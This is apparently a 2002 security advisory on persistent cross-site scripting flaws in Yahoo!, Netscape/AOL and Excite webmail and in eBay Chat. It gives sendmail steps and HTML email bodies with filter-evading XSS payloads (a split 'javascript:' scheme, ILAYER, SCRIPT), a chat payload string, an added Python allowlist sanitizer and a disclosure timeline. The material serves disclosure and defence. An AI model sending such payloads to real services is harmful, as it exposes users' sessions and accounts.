I. BACKGROUND
Many web applications generate dynamic HTML web pages using user-submitted data and other sources of "untrusted content." Web applications that do not meticulously filter this untrusted content before presenting the web page to the user may allow the web page, and the way a web browser interprets its content, to be manipulated. This
issue becomes dangerous when untrusted content can be inserted into a dynamic HTML web page via a web application or other means, causing potentially malicious code to execute within a user's browser with the exact same privileges as the legitimate web server.
II. DESCRIPTION
Some web applications, such as Yahoo! Mail and others, already meticulously filter incoming untrusted data before the content reaches their users. However, given the loose interpretation of HTML/JavaScript/VBScript etc. by various web browsers, obfuscated
content may elude the current filters and execute within the user's browser environment, thereby allowing an attacker to target users almost instantly without relying on the user performing any activities other than normal usage. All vulnerabilities affect web browsers created by Microsoft Corp. or Netscape Communications Corp. These types of XSS vulnerabilities are usually classified as "constant-state", as they exist persistently for more than just one HTTP request. More detailed XSS exploitation scenarios are described in an iDEFENSE paper available at http://www.idefense.com/XSS.html.
III. ANALYSIS
Yahoo! Mail
The following XSS vulnerability only existed for Netscape 4.x browsers (see Vendor Fix/Response; this issue has since been addressed by Yahoo!):
bash$ sendmail -t target@yahoo.com
Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@foo.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack
<HTML><BODY>
<ILAYER SRC="script.js"></ILAYER>
</BODY></HTML>
.
--------------------------------------------------
Netscape/AOL Webmail
This XSS vulnerability exists in Netscape Mail (webmail.netscape.com) and AOL Webmail (webmail.aol.com). The following XSS behavior can be caused in both IE 5.x/6.x and Netscape 4.x:
bash$ sendmail -t target@netscape.net
Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@foo.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack
<HTML><BODY>
<IMG SRC="javasc
ript:alert('test');">
</BODY></HTML>
.
--------------------------------------------------
Excite Webmail
It would seem that Excite does not perform any filtering of HTML/SCRIPT whatsoever. The following XSS behavior can be caused in both IE 5.x/6.x and Netscape 4.x/6.x:
bash$ sendmail -t target@excite.com
Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@foo.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack
<HTML><BODY>
<SCRIPT>alert(document.domain);</SCRIPT>
</BODY></HTML>
.
--------------------------------------------------
eBay Chat
While you are logged in as an eBay user, place the text string below within the chat text field and click submit. The message will appear within the main chat text message and will execute in a user's browser when read. The following XSS behavior can be caused in both IE 5.x/6.x and Netscape 4.x:
---- XSS String ------------------------------------
<IMG SRC="javasc
ript:alert(document.domain);">
----------------------------------------------------
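The Description section explains why the filters in place at the time were evaded: a blacklist looking for literal tokens such as "javascript:" does not see the scheme once a newline is dropped into it, and a tag-based blacklist does not anticipate browser-specific elements such as ILAYER. The following is an added example (not code from iDEFENSE, WhiteHat Security, or any of the vendors named above) that demonstrates the defender's side for the three mail bodies shown in the Analysis section: a naive substring blacklist that misses the split-scheme and ILAYER payloads, beside an allowlist sanitizer that normalizes URL attribute values (stripping whitespace and control characters and decoding entities) before checking the scheme, and keeps only known-safe tags. The allowlisted tag set, the safe scheme list, and the sample message bodies are assumptions chosen for the example; the entity-encoded sample goes beyond what the advisory shows, since the same normalization covers that variant.

```python
import html
import re
from html.parser import HTMLParser

# Constructed samples: the three HTML bodies from the advisory (Yahoo!/ILAYER,
# Netscape/IMG with a newline inside the scheme, Excite/SCRIPT), a benign body,
# and an entity-encoded scheme that the same normalization handles.
SAMPLES = {
    "ilayer": '<HTML><BODY>\n<ILAYER SRC="script.js"></ILAYER>\n</BODY></HTML>',
    "split_scheme": '<HTML><BODY>\n<IMG SRC="javasc\nript:alert(\'test\');">\n</BODY></HTML>',
    "script": '<HTML><BODY>\n<SCRIPT>alert(document.domain);</SCRIPT>\n</BODY></HTML>',
    "benign": '<HTML><BODY><IMG SRC="http://example.com/a.gif"><B>hi</B></BODY></HTML>',
    "entity": '<HTML><BODY><IMG SRC="&#106;avascript:alert(1)"></BODY></HTML>',
}


def naive_filter_blocks(body: str) -> bool:
    """A substring blacklist of the kind the advisory describes as being evaded:
    case-insensitive match on a few literal tokens, with no normalization."""
    lowered = body.lower()
    return any(tok in lowered for tok in ("<script", "javascript:", "vbscript:"))


def normalize_url(value: str) -> str:
    """Canonicalize a URL attribute value before any scheme check: decode entities
    (HTMLParser already does this for attributes; repeating it here is harmless and
    only makes the check stricter), drop ASCII whitespace/control characters that
    browsers of the era ignored inside a scheme, and lowercase."""
    value = html.unescape(value)
    value = re.sub(r"[\x00-\x20\x7f]", "", value)
    return value.lower()


# Assumed allowlists for the example; a real deployment would tune these.
ALLOWED_TAGS = {"html", "body", "p", "br", "b", "i", "u", "font", "div", "span",
                "a", "img", "table", "tr", "td"}
URL_ATTRS = {"src", "href", "background", "lowsrc"}
SAFE_SCHEMES = ("http:", "https:", "mailto:")


class AllowlistSanitizer(HTMLParser):
    """Rebuilds the document from allowlisted tags only; URL attributes must carry a
    safe absolute scheme or be scheme-less (no ':' at all after normalization)."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []   # (reason, detail) pairs, useful as a detection log
        self.in_raw = None  # set while inside a dropped <script>/<style> body

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.in_raw = tag
        if tag not in ALLOWED_TAGS:
            self.dropped.append(("tag", tag))
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):            # inline event handlers
                self.dropped.append(("event-handler", name))
                continue
            if name in URL_ATTRS:
                norm = normalize_url(value)
                if not (norm.startswith(SAFE_SCHEMES) or ":" not in norm):
                    self.dropped.append(("url", value))
                    continue
            kept.append((name, value))
        attr_text = "".join(f' {n}="{html.escape(v, quote=True)}"' for n, v in kept)
        self.out.append(f"<{tag}{attr_text}>")

    def handle_endtag(self, tag):
        if tag == self.in_raw:
            self.in_raw = None
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self.in_raw:      # discard the body of a dropped script/style element
            return
        self.out.append(html.escape(data))


def sanitize(body: str):
    """Return (sanitized_html, dropped_items) for an untrusted HTML message body."""
    parser = AllowlistSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out), parser.dropped


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        cleaned, dropped = sanitize(body)
        print(f"{name}: naive blocks={naive_filter_blocks(body)} dropped={dropped}")
        print("  ->", cleaned.replace("\n", "\\n"))
```

The point of the comparison is that the check must run on the canonical form of the value, not on the bytes as received, and that the decision should be an allowlist (which schemes and tags are permitted) rather than a blacklist of what is forbidden; the `dropped` list doubles as a detection record that can be logged when a message is rejected or altered.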
IV. DETECTION
The following are affected:
Yahoo! Mail http://mail.yahoo.com
Netscape Mail http://webmail.netscape.com
AOL Webmail http://webmail.aol.com (same as Netscape Mail)
Excite Mail http://mail.excite.com
eBay Chat http://pages.ebay.com/community/chat/index.html
V. WORKAROUND
No workaround is available as of this writing.
VI. VENDOR FIX/RESPONSE
On July 16, 2002, Scott Renfro (scottr@yahoo-inc.com), who goes by the title "Paranoid Yahoo," said that the issue was fixed in Yahoo! Mail.
VII. CVE INFORMATION
The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project did not assign identification numbers to these issues.
VIII. DISCLOSURE TIMELINE
6/27/02 Issue disclosed to iDEFENSE
7/16/02 Ebay, AOL/Netscape, Yahoo, and Excite notified
7/16/02 iDEFENSE clients notified
8/11/02 Second notice given to Excite, AOL/Netscape, and eBay through web customer service suggestion systems
8/19/02 Still no response from Excite, AOL/Netscape, or eBay
8/19/02 iDEFENSE released public advisory
IX. CREDIT
Jeremiah Grossman (jeremiah@whitehatsec.com) and Lex Arquette (lex@whitehatsec.com) of WhiteHat Security Inc. are credited with discovering these bugs.